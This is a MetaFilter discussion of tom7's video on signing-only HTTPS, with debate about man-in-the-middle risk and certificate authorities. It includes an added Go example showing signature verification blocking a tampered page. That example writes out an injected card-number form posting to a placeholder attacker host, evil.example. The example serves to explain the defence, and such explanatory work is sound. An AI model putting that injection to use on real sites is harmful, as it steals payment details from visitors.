MetaFilter community weblog
a pre-paid self-own
tom7/suckerpinch tweaks HTTPS to add minimal security to a website that doesn't need security. YouTube, 35 minutes. tom7 previously
posted by fantabulous timewaster on Apr 15, 2026 at 9:38 PM
---------------------------
I was considering posting this myself, but you saved me the trouble! It's great as tom7's papers and videos tend to be.
posted by JHarris at 12:18 AM
---------------------------
...or PDF: https://tom7.org/httpv/httpv.pdf
I read the PDF yesterday, it's cute and untroubled by the theatrical aspects of online security.
posted by k3ninho at 3:23 AM
---------------------------
I'm not onboard with his idea of toxic max security, because I don't think it's actually that exclusionary on the modern web. But quietly breaking curl is interesting. I wonder if that would be a more effective way than robots.txt to prevent your site from being sucked up into LLM training data.
posted by postcommunism at 5:45 AM
---------------------------
The point where I got hooked on this video is when he said "it's a little weird that my CAD mouse can sign certificates for my bank website"
posted by mcstayinskool at 5:57 AM
---------------------------
m o r e e n g a g e m e n t
posted by bitslayer at 7:03 AM
---------------------------
It's cute, but the "but MY web site doesn't accept any private info/is totally public/etc!" argument falls down if you assume a man-in-the-middle (MITM) attacker: with plain HTTP, that attacker can happily modify the site content (as delivered to an end user) to, e.g., request your credit card number. A visitor then thinks "oh, yeah, I want some Tom7 merch, let me just hand over my credit card details" even if the original site had no "hand over your credit card" page.
Yes, thwarting that attack only requires signing, not encryption, but you still have to have a certificate attesting that your signature is actually yours, which requires the whole certificate authority infrastructure which he rails against (and which, to be fair, has numerous problems) and neither the average user nor the median software developer knows enough to know when signing is sufficient vs full end-to-end encryption.
(And Chrome and Firefox developers have learned that trying to train users to look for the padlock before entering their banking password is pretty much futile — anything that requires even the slightest vigilance from users fails pretty often. The solution is to just require HTTPS everywhere, which at least eliminates one attack vector and means that there is no padlock to ignore.)
(OpenSSL is a pile of hot garbage and has far, far too large of an attack surface, so he's right on that. BoringSSL is better, but still inherits a lot of OpenSSL's code. One day, maybe, we'll end up with digital infrastructure that isn't 70 layers of cruft accreted over decades, but that day isn't coming soon.)
(Also: before the age of generative AI I might have accepted "my site is so niche and low-traffic that no one is going to bother to MITM inject a store page," but now that it's extremely cheap to ask your favorite LLM to write a little merch page and fake a checkout screen, that attack becomes easy enough to do in bulk. Plus, non-security developers are notoriously awful at doing these kinds of threat analyses.)
posted by reventlov at 8:18 AM
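The injection-then-signing argument in the comment above, as an added example that is not part of the thread, the video, or tom7's HTTPV paper. It assumes a detached Ed25519 signature over the plaintext body and a client that already holds the site's public key (pinned in-process here; that pinned key is exactly the key-distribution/CA problem the comment points at). The page body, the injected checkout form and the evil.example host are constructed for illustration.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"fmt"
	"strings"
)

// Constructed page body for the example; nothing here is from the real site.
const originalBody = "<html><body><h1>Tom 7 Radar</h1><p>Just some papers.</p></body></html>"

// Constructed attacker payload: a card-number form posting to a host the
// attacker controls. evil.example is a placeholder, not a real host.
const injectedForm = `<form action="http://evil.example/checkout" method="post">` +
	`Card number: <input name="cc"></form>`

// SignedResponse is what the publisher puts on the wire: the plaintext body
// plus a detached Ed25519 signature over it. Nothing is encrypted.
type SignedResponse struct {
	Body []byte
	Sig  []byte
}

// Publish signs the body with the site's private key (signing only).
func Publish(priv ed25519.PrivateKey, body []byte) SignedResponse {
	return SignedResponse{Body: body, Sig: ed25519.Sign(priv, body)}
}

// OnPathAttacker models a hostile hotspot or compromised router: it rewrites
// the plaintext body to add a checkout form. It has no private key, so it can
// only forward the original signature, which no longer matches.
func OnPathAttacker(r SignedResponse) SignedResponse {
	tampered := strings.Replace(string(r.Body), "</body>", injectedForm+"</body>", 1)
	return SignedResponse{Body: []byte(tampered), Sig: r.Sig}
}

// NaiveClient is today's plain-HTTP browser: it renders whatever arrives.
func NaiveClient(r SignedResponse) (body []byte, accepted bool) {
	return r.Body, true
}

// VerifyingClient accepts the body only if the detached signature checks out
// under a public key it already trusts. How the client came to trust that key
// (pinning, a CA, something else) is out of scope for this example.
func VerifyingClient(pub ed25519.PublicKey, r SignedResponse) (body []byte, accepted bool) {
	if !ed25519.Verify(pub, r.Body, r.Sig) {
		return nil, false
	}
	return r.Body, true
}

// Outcome records what each client did with the genuine and tampered responses.
type Outcome struct {
	NaiveAcceptedTampered     bool
	NaiveSawInjectedForm      bool // the injected card form reached the renderer
	VerifyingAcceptedGenuine  bool
	VerifyingAcceptedTampered bool
}

// RunScenario generates a fresh site key, publishes the page, passes it through
// the on-path attacker, and runs both clients against the result.
func RunScenario() (Outcome, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	genuine := Publish(priv, []byte(originalBody))
	tampered := OnPathAttacker(genuine)

	naiveBody, naiveOK := NaiveClient(tampered)
	_, verGenuineOK := VerifyingClient(pub, genuine)
	_, verTamperedOK := VerifyingClient(pub, tampered)

	return Outcome{
		NaiveAcceptedTampered:     naiveOK,
		NaiveSawInjectedForm:      bytes.Contains(naiveBody, []byte("evil.example")),
		VerifyingAcceptedGenuine:  verGenuineOK,
		VerifyingAcceptedTampered: verTamperedOK,
	}, nil
}

func main() {
	o, err := RunScenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("naive client rendered injected card form: %v\n", o.NaiveSawInjectedForm)
	fmt.Printf("verifying client accepted genuine page:   %v\n", o.VerifyingAcceptedGenuine)
	fmt.Printf("verifying client accepted tampered page:  %v\n", o.VerifyingAcceptedTampered)
}
```

Two caveats worth keeping in mind when reading it: the signature here covers only the body, so a 3XX redirect or a rewritten Location header of the kind the next comment mentions would need to be covered as well, and nothing above provides freshness, so an attacker could still replay an old but validly signed body.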
---------------------------
It's really easy to check for security when you're submitting or displaying a form. You want to require SSL when someone is doing an interaction that uses POST or GET parameters? Fine. You tell the user about that. A simple URL request? Ugh. Look, you want to see a real attack? Here's an example: Google "foldimate". You'll see a couple of links above the fold. (This is a less fun demo than it used to be, because at least one of the domains has expired, but the other one works.) It's a valid HTTPS link, with a valid ecommerce backend that will take your money and sell you nothing, because the company shut down half a decade ago and never shipped a product. There's no way to really report links anymore, so Google won't fix obvious scams like this, enabled entirely by their flagship product.
That's an actual threat. The scare warnings on HTTP pages are concern trolling from a company that wants to add more barriers to your ability to publish information without going through a gatekeeper.
posted by phooky at 9:22 AM
---------------------------
You want to require SSL when someone is doing an interaction that uses POST or GET parameters? Fine. You tell the user about that.
So now the MITM attacker has a very minor speed bump in that they have to either 3XX redirect you to a domain they control or add a "Merch!" link to a domain they control.
You are correct that there are many other ways to trick a user into handing over their card info; that doesn't mean we shouldn't plug this one.
Also: Google is better off with a more open web with fewer gatekeepers; driving people to put their pages on walled gardens is pretty terrible for Search, which is, IIRC, still the #2 cash cow for Google, and not good for AdSense, which is (again, IIRC) #1. This isn't the same situation as the garbage they're trying to pull with disabling sideloading on Android, where they have multiple very strong financial incentives to close things off, or even the Manifest v3 change that made ad blockers less effective.
posted by reventlov at 10:40 AM
---------------------------
Fair enough; as rare as actual MITM attacks are, this does help reduce them. The associated PDF does a pretty good job at explaining why anyone who can MITM you is pretty likely to pwn you anyway, though.
There is a huge gulf between what Google is better off with and what Google actually does. We used to joke that Google could do whatever the hell they wanted without consequence as long as they didn't fuck up search, and then they fucked up search. Like so many other big tech companies, they are juggernauts of pure inertia, techbro continental drift, colliding in slow motion, causing earthquakes and volcanic eruptions and just generally fucking up everybody's day.
posted by phooky at 12:16 PM
---------------------------
If you want an example of how far inertia can take a tech company, or whatever a tech company morphs into, consider that we still all know what Yahoo is, or was, it's not a word that has decayed into meaninglessness to us.
posted by JHarris at 1:01 PM
---------------------------
The associated PDF does a pretty good job at explaining why anyone who can MITM you is pretty likely to pwn you anyway, though.
That's still thinking about "how does someone compromise my site," which is not the only threat model: practical MITM attacks, IIRC, are almost always out at the browser-facing edges of the network: malicious hotspots, compromised consumer routers, etc. None of those will get you a Let's Encrypt cert or do much of anything to the server whose domain you're intercepting, but they will let you sniff or alter any unencrypted traffic for any user behind the compromised device.
posted by reventlov at 7:29 AM
---------------------------